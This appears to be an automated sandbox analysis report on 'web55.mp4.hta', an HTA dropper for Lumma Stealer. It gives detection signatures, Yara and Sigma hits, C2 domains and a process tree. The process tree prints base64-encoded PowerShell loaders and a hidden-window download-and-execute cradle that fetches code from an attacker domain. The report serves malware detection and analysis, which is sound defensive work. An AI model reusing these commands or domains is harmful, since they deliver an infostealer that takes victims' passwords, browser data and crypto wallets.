Edit tour
Windows
Analysis Report
web55.mp4.hta
Overview
General Information
| Sample name: | web55.mp4.hta |
| Analysis ID: | 1585911 |
| MD5: | 888e63b183a6eb78b5e205a1be94dadb |
| SHA1: | a7561a7bd2aec16f4aa414b4427767bd071adbf1 |
| SHA256: | 1fd2a20e4495bd158b7572dd2b9fa6ab69d9c129e630cdc26bf8f26850a99100 |
| Tags: | htaLummaStealeruser-lontze7 |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 6976 cmdline: mshta.exe "C:\Users\ user\Deskt op\web55.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 7324 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ep Unrest ricted -w 1 sc $env: Temp\a.ps1 ([System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring('ZnV uY3Rpb24gS 0ZiQygkS3l HWXJVVUQpe w0KKCgkS3l HWXJVVUQgL XNwbGl0ICc oPzw9XEcuL iknfCV7JEV KdXAuU3ViU 3RyaW5nKDM sMTAwKVskX 119KSAgLWp vaW4gJycgL XJlcGxhY2U gIi4kIil9O yRFSnVwID0 naWV4bXZ7d U4xaUtGZSJ BT0V1Vnk1I m9ZezZQbFB hLzphYjRJW i5PYjJxLTd XO0NkSFxne FF3L016SkF qcnQzQDZCf UROJX5UblU ofTBRc3Nfa CVoSWZrKWM 5WEw4NCNAU nlTKm9HcDY 1MDk1ODM0N DEwOTM2NDM yNDA2MDk2O TU4Jw==')) );cmd.exe /k start p owershell -w 1 ([Sys tem.Text.E ncoding]:: UTF8.GetSt ring([Syst em.Convert ]::FromBas e64String( 'cG93ZXJza GVsbCAtZW5 jIFV3QjBBR 0VBY2dCMEF DMEFVQUJ5Q Uc4QVl3Qmx BSE1BY3dBZ 0FDSUFRd0E 2QUZ3QVZ3Q nBBRzRBWkF CdkFIY0Fjd 0JjQUZNQWV RQnpBRmNBY ndCM0FEWUF OQUJjQUZjQ WFRQnVBR1F BYndCM0FIT UFVQUJ2QUh jQVpRQnlBR k1BYUFCbEF Hd0FiQUJjQ UhZQU1RQXV BREFBWEFCd 0FHOEFkd0J sQUhJQWN3Q m9BR1VBYkF Cc0FDNEFaU UI0QUdVQUl nQWdBQzBBU VFCeUFHY0F kUUJ0QUdVQ WJnQjBBRXd BYVFCekFIU UFJQUFpQUM wQWR3QWdBR 2dBYVFCa0F HUUFaUUJ1Q UNBQUxRQmx BSEFBSUFCa UFIa0FjQUJ oQUhNQWN3Q WdBQzBBYmd CdkFIQUFJQ UF0QUVNQWJ 3QnRBRzBBW VFCdUFHUUF JQUJnQUNJQ WFRQmxBSGd BSUFBb0FDZ 0FUZ0JsQUh jQUxRQlBBR 0lBYWdCbEF HTUFkQUFnQ UZNQWVRQnp BSFFBWlFCd EFDNEFUZ0J sQUhRQUxnQ lhBR1VBWWd CREFHd0FhU UJsQUc0QWR BQXBBQzRBU kFCdkFIY0F iZ0JzQUc4Q VlRQmtBRk1 BZEFCeUFHa 0FiZ0JuQUN nQUp3Qm9BS FFBZEFCd0F ITUFPZ0F2Q UM4QWR3Qmx BR0lBTGdCc kFHd0FhUUJ 3QUdRQWVRQ jNBRzhBZWd CcEFIa0FMZ 0J6QUdnQWJ 3QndBQzhBY XdCMUFHNEF iZ0JoQUhJQ UxnQndBRzR BWndBbkFDa 0FLUUJnQUN JQUlnQWdBQ zBBVndCcEF HNEFaQUJ2Q UhjQVV3QjB BSGtBYkFCb EFDQUFTQUJ wQUdRQVpBQ mxBRzRBOy4 gJGVudjpUZ W1wXGEucHM xOyBmdW5jd GlvbiBLeUd ZclVVRCgpe 2Z1bmN0aW9 uIGV6cENNZ GhHUSgkckh QZWIpe2lmK CEoVGVzdC1 QYXRoIC1QY XRoICRUaEJ FWHBpVk8pK XtjdXJsICh LRmJDICRyS FBlYikgLW8 gJFRoQkVYc GlWT319fUt 5R1lyVVVEO w=='))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7332 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7460 cmdline:
"C:\Window s\system32 \cmd.exe" /k start p owershell -w 1 "powe rshell -en c UwB0AGEA cgB0AC0AUA ByAG8AYwBl AHMAcwAgAC IAQwA6AFwA VwBpAG4AZA BvAHcAcwBc AFMAeQBzAF cAbwB3ADYA NABcAFcAaQ BuAGQAbwB3 AHMAUABvAH cAZQByAFMA aABlAGwAbA BcAHYAMQAu ADAAXABwAG 8AdwBlAHIA cwBoAGUAbA BsAC4AZQB4 AGUAIgAgAC 0AQQByAGcA dQBtAGUAbg B0AEwAaQBz AHQAIAAiAC 0AdwAgAGgA aQBkAGQAZQ BuACAALQBl AHAAIABiAH kAcABhAHMA cwAgAC0Abg BvAHAAIAAt AEMAbwBtAG 0AYQBuAGQA IABgACIAaQ BlAHgAIAAo ACgATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ATgBlAHQA LgBXAGUAYg BDAGwAaQBl AG4AdAApAC 4ARABvAHcA bgBsAG8AYQ BkAFMAdABy AGkAbgBnAC gAJwBoAHQA dABwAHMAOg AvAC8AdwBl AGIALgBrAG wAaQBwAGQA eQB3AG8Aeg BpAHkALgBz AGgAbwBwAC 8AawB1AG4A bgBhAHIALg BwAG4AZwAn ACkAKQBgAC IAIgAgAC0A VwBpAG4AZA BvAHcAUwB0 AHkAbABlAC AASABpAGQA ZABlAG4A;. $env:Temp \a.ps1; fu nction KyG YrUUD(){fu nction ezp CMdhGQ($rH Peb){if(!( Test-Path -Path $ThB EXpiVO)){c url (KFbC $rHPeb) -o $ThBEXpiV O}}}KyGYrU UD;" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 7476 cmdline:
powershell -w 1 "pow ershell -e nc UwB0AGE AcgB0AC0AU AByAG8AYwB lAHMAcwAgA CIAQwA6AFw AVwBpAG4AZ ABvAHcAcwB cAFMAeQBzA FcAbwB3ADY ANABcAFcAa QBuAGQAbwB 3AHMAUABvA HcAZQByAFM AaABlAGwAb ABcAHYAMQA uADAAXABwA G8AdwBlAHI AcwBoAGUAb ABsAC4AZQB 4AGUAIgAgA C0AQQByAGc AdQBtAGUAb gB0AEwAaQB zAHQAIAAiA C0AdwAgAGg AaQBkAGQAZ QBuACAALQB lAHAAIABiA HkAcABhAHM AcwAgAC0Ab gBvAHAAIAA tAEMAbwBtA G0AYQBuAGQ AIABgACIAa QBlAHgAIAA oACgATgBlA HcALQBPAGI AagBlAGMAd AAgAFMAeQB zAHQAZQBtA C4ATgBlAHQ ALgBXAGUAY gBDAGwAaQB lAG4AdAApA C4ARABvAHc AbgBsAG8AY QBkAFMAdAB yAGkAbgBnA CgAJwBoAHQ AdABwAHMAO gAvAC8AdwB lAGIALgBrA GwAaQBwAGQ AeQB3AG8Ae gBpAHkALgB zAGgAbwBwA C8AawB1AG4 AbgBhAHIAL gBwAG4AZwA nACkAKQBgA CIAIgAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4A; . $env:Tem p\a.ps1; f unction Ky GYrUUD(){f unction ez pCMdhGQ($r HPeb){if(! (Test-Path -Path $Th BEXpiVO)){ curl (KFbC $rHPeb) - o $ThBEXpi VO}}}KyGYr UUD;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7604 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -enc UwB0A GEAcgB0AC0 AUAByAG8AY wBlAHMAcwA gACIAQwA6A FwAVwBpAG4 AZABvAHcAc wBcAFMAeQB zAFcAbwB3A DYANABcAFc AaQBuAGQAb wB3AHMAUAB vAHcAZQByA FMAaABlAGw AbABcAHYAM QAuADAAXAB wAG8AdwBlA HIAcwBoAGU AbABsAC4AZ QB4AGUAIgA gAC0AQQByA GcAdQBtAGU AbgB0AEwAa QBzAHQAIAA iAC0AdwAgA GgAaQBkAGQ AZQBuACAAL QBlAHAAIAB iAHkAcABhA HMAcwAgAC0 AbgBvAHAAI AAtAEMAbwB tAG0AYQBuA GQAIABgACI AaQBlAHgAI AAoACgATgB lAHcALQBPA GIAagBlAGM AdAAgAFMAe QBzAHQAZQB tAC4ATgBlA HQALgBXAGU AYgBDAGwAa QBlAG4AdAA pAC4ARABvA HcAbgBsAG8 AYQBkAFMAd AByAGkAbgB nACgAJwBoA HQAdABwAHM AOgAvAC8Ad wBlAGIALgB rAGwAaQBwA GQAeQB3AG8 AegBpAHkAL gBzAGgAbwB wAC8AawB1A G4AbgBhAHI ALgBwAG4AZ wAnACkAKQB gACIAIgAgA C0AVwBpAG4 AZABvAHcAU wB0AHkAbAB lACAASABpA GQAZABlAG4 A MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 7700 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://w eb.klipdyw oziy.shop/ kunnar.png '))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7508 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe (PID: 6680 cmdline: "C:\Users\ user~1\App Data\Local \Temp\2AZA 84BP4AM1TV WCT7DQB9ZW GJA.exe" MD5: 89470385FDDACB118DEB7A7941E6A666)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["femalsabler.shop", "soundtappysk.shop", "quinceisoz.cam", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "handscreamny.shop", "crowdwarek.shop", "chipdonkeruz.shop"], "Build id": "WG6I6S--web55"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | ||
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||